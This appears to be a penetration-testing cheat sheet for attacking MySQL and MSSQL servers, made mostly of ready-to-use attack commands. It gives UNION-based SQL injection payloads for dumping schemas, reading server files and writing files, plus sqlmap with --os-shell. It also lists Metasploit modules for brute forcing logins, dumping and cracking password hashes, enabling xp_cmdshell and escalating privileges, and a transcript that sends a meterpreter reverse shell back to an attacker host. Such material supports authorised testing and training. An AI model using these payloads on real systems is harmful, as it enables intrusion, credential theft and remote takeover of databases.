Table of Contents
MySQL
Enumeration
Manual SQL Injection
If some search field is vulnerable to injection. Use below techniques
# in burp suite check the length change
' order by [num]-- -
' union select 1,2,3,4,5,6-- -
# and you can overide any of the entries to run commands
' union select (user()),2,3,4,5,6-- -
# extract from schema provided you know how many entries are there
' union select (select group_concat(SCHEMA_NAME SEPARATOR ';') from INFORMATION_SCHEMA.SCHEMATA ),2,3,4,5,6-- -
# extract from schema for table names provided you know how many entries are there
' union select (select group_concat(TABLE_NAME SEPARATOR ';') from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = '<db-name>' ),2,3,4,5,6-- -
# load file content
' union select (select group_concat("\n\n",TO_BASE64(LOAD_FILE('C\\inetpub\\wwwroot\\database.php')), "\n\n"),"\n\n",3,4,5,6-- -
# get user privs
' union select (select group_concat(GRANTEE,":",TABLE_CATALOG,":",PRIVILEGE_TYPE,":",IS_GRANTABLE SEPARATOR ';') from INFORMATION_SCHEMA.USER_PRIVILEGES),2,3,4,5,6-- -
# save content to file
' union select ("Some text"),2,3,4,5,6 INTO [OUTFILE|DUMPFILE] 'path'-- -Sqlmap
Scan for potential SQL injections with sqlmap
sqlmap -u '<host-ip>?<query>' --cookie="<cokie>"Foothold
Sqlmap
If the database is vulnerable to SQL injection, get a shell with sqlmap
sqlmap -u '<host-ip>?<query>' --cookie="<cokie>" --os-shellMysqldump
Got user credential, mysql server is running and have mysqldump installed
mysqldump -A -u[username] -p[pasword] [-X] > outputfileMSSQL
Enumeration
Mssql_ping
By default, MS SQL is installed on TCP port 1433 and UDP port 1434, though newer versions allow for installation on a dynamically allocated port, which can be randomized. Luckily, port 1434 UDP (for which we did not scan) remains the same
and can be queried to identify the dynamic port of the SQL server.
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.33.1/24
RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploitMssql_enum
Dump all server info
use auxiliary/admin/mssql/mssql_enumMssql_enum_logins
Obtain all logins for server
use auxiliary/admin/mssql/mssql_enum_sql_loginsMssql_schemadump
Dump all schema from server
use auxiliary/scanner/mssql/mssql_schemadumpBrute Forcing
Mssql_login
Brute force mssql login
use auxiliary/scanner/mssql/mssql_loginJtr_mssql_fast
Crack hashes dumped
use auxiliary/analyze/jtr_mssql_fastFoothold
Mssqlclient.py
Got username and password
mssqlclient.py <username>@host -windows-authMssql_payload
Send payload through xp_cmdshell.
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp Y
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
80 Chapter 6
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(mssql_payload) > set PASSWORD password123
PASSWORD => password123
msf exploit(mssql_payload) > exploit
...
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter >Lateral Movement
Mssql_hashdump
Dump all password hashes from server
use auxiliary/scanner/mssql/mssql_hashdumpXP_cmdshell
# check user role
SELECT IS_SRVROLEMEMBER('sysadmin|dbcreator')
# show present configuration
sp_configure
# configure xp_shellcmd
EXEC sp_configure '<option|Show Advanced Options|xp_cmdshell>, <value[1|0]>'Privilege Escalation
Mssql_escalate_dbowner
User has db_owner role, can be escalated to admin
use auxiliary/admin/mssql/mssql_escalate_dbownerMssql_escalate_execute_as
user has IMPERSONATION privilege, can be escalated to admin
use auxiliary/admin/mssql/mssql_escalate_execute_as